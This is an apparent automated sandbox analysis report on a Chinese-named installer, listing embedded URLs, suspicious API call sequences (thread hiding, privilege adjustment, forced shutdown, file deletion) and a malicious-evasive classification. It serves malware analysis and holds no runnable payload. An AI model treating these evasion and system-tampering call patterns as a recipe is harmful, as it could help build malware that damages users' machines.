Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://ocsp.digicert.com0A
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://ocsp.digicert.com0C
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://ocsp.digicert.com0H
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://ocsp.digicert.com0I
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://ocsp.digicert.com0X
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://www.digicert.com/CPS0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.drString found in binary or memory: http://www.metalinker.org/
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.drString found in binary or memory: http://www.metalinker.org/basic_string::_M_construct
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.drString found in binary or memory: https://aria2.github.io/
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.drString found in binary or memory: https://aria2.github.io/Usage:
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.drString found in binary or memory: https://github.com/aria2/aria2/issues
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.drString found in binary or memory: https://github.com/aria2/aria2/issuesReport
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000003.1704613298.000000007F64B000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000003.1704203075.0000000003460000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000000.1706263818.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000000.1769046154.0000000000F4D000.00000020.00000001.01000000.00000008.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.0.dr, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.5.drString found in binary or memory: https://www.innosetup.com/
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000003.1704613298.000000007F64B000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000003.1704203075.0000000003460000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000000.1706263818.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000000.1769046154.0000000000F4D000.00000020.00000001.01000000.00000008.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.0.dr, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.5.drString found in binary or memory: https://www.remobjects.com/ps

Operating System Destruction

barindex
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess information set: 01 00 00 00 Jump to behavior

System Summary

barindex
Source: update.vac.1.drStatic PE information: section name: .j)q
Source: update.vac.6.drStatic PE information: section name: .j)q
Source: updat4.vac.6.drStatic PE information: section name: .j)q
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CA63F30 NtSetInformationThread,OpenSCManagerA,CloseServiceHandle,OpenServiceA,CloseServiceHandle,6_2_6CA63F30
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6C8E3886 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6C8E3886
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6C8E3C62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6C8E3C62
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6C8E3D18 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6C8E3D18
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6C8E3D62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6C8E3D62
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6C8E39CF NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6C8E39CF
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6C8E3A6A NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6C8E3A6A
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CA64B80 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,6_2_6CA64B80
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6C8E1950: CreateFileA,DeviceIoControl,CloseHandle,6_2_6C8E1950
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6C8E4754 _strlen,CreateFileA,CreateFileA,CloseHandle,_strlen,std::ios_base::_Ios_base_dtor,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,TerminateProcess,GetCurrentProcess,TerminateProcess,_strlen,Sleep,ExitWindowsEx,Sleep,DeleteFileA,Sleep,_strlen,DeleteFileA,Sleep,_strlen,std::ios_base::_Ios_base_dtor,6_2_6C8E4754
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6C8E47546_2_6C8E4754
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CA658636_2_6CA65863
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CA609006_2_6CA60900
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CAC4CE06_2_6CAC4CE0
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CB11D506_2_6CB11D50
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CA96EA16_2_6CA96EA1
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CB17E806_2_6CB17E80
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CAB0EC96_2_6CAB0EC9
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CB0C8106_2_6CB0C810
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CB179F06_2_6CB179F0
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CB289306_2_6CB28930
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CA969726_2_6CA96972
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CB0FAA06_2_6CB0FAA0
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CB22AA06_2_6CB22AA0
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CB0BAD06_2_6CB0BAD0
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CB0DA506_2_6CB0DA50
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CA9EBCA6_2_6CA9EBCA
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CAAEB666_2_6CAAEB66
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CAB340A6_2_6CAB340A
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CB105806_2_6CB10580
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CB1D5C06_2_6CB1D5C0
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CB176E06_2_6CB176E0
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CA9A7CF6_2_6CA9A7CF
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CB377006_2_6CB37700
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CB0E0206_2_6CB0E020
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CB217506_2_6CB21750
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_003C81EC10_2_003C81EC
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0039E00A10_2_0039E00A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0040000010_2_00400000
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004081C010_2_004081C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0041824010_2_00418240
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004022E010_2_004022E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0042230010_2_00422300
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0041C3C010_2_0041C3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004104C810_2_004104C8
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_003EE49F10_2_003EE49F
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004025F010_2_004025F0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_003F865010_2_003F8650
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_003FA6A010_2_003FA6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_003F66D010_2_003F66D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_003FC95010_2_003FC950
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_003D094310_2_003D0943
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0041E99010_2_0041E990
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00402A8010_2_00402A80
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_003DAB1110_2_003DAB11
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_003F8C2010_2_003F8C20
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00406CE010_2_00406CE0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00410E0010_2_00410E00
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00414EA010_2_00414EA0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_003E10AC10_2_003E10AC
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0040D08910_2_0040D089
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_003EB12110_2_003EB121
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0041112010_2_00411120
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004191C010_2_004191C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_003FB18010_2_003FB180
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0040518010_2_00405180
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_003FD1D010_2_003FD1D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0041720010_2_00417200
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0041D2C010_2_0041D2C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0041F3C010_2_0041F3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_003E53F310_2_003E53F3
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_003AB3E410_2_003AB3E4
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0040F3A010_2_0040F3A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_003853CF10_2_003853CF
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_003F741010_2_003F7410
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0041D47010_2_0041D470
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0040F42010_2_0040F420
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004154D010_2_004154D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_003CD49610_2_003CD496
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0041155010_2_00411550
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_003FF50010_2_003FF500
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0038157210_2_00381572
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0042351A10_2_0042351A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0041353010_2_00413530
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0041F59910_2_0041F599
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0042360110_2_00423601
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_003D965210_2_003D9652
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0040D6A010_2_0040D6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0039976610_2_00399766
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_004177C010_2_004177C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_003897CA10_2_003897CA
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_003AF8E010_2_003AF8E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_003FF91010_2_003FF910
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0041D9E010_2_0041D9E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00381AA110_2_00381AA1
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00407AF010_2_00407AF0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_003D3AEF10_2_003D3AEF
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0039BAC910_2_0039BAC9
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00407C5010_2_00407C50
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0039BC9210_2_0039BC92
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00405E8010_2_00405E80
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00405F8010_2_00405F80
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess token adjusted: SecurityJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: String function: 6CA97240 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: String function: 6CB34F10 appears 415 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 00381E40 appears 84 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 003828E3 appears 34 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 0041FB10 appears 720 times
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.5.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeStatic PE information: Number of sections : 11 > 10
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.5.drStatic PE information: Number of sections : 11 > 10
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.0.drStatic PE information: Number of sections : 11 > 10
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000000.1702203686.00000000002F9000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameSRClient.exe vs #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000003.1704203075.000000000357E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameSRClient.exe vs #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000003.1704613298.000000007F94A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameSRClient.exe vs #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeBinary or memory string: OriginalFileNameSRClient.exe vs #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tProtect.dll.12.drBinary string: \Device\TfSysMon
Source: tProtect.dll.12.drBinary string: \Device\TfKbMonPWLCache
Source: classification engineClassification label: mal80.evad.winEXE@146/32@0/0
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CA64B80 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,6_2_6CA64B80
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00389313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,10_2_00389313
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00393D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,10_2_00393D66
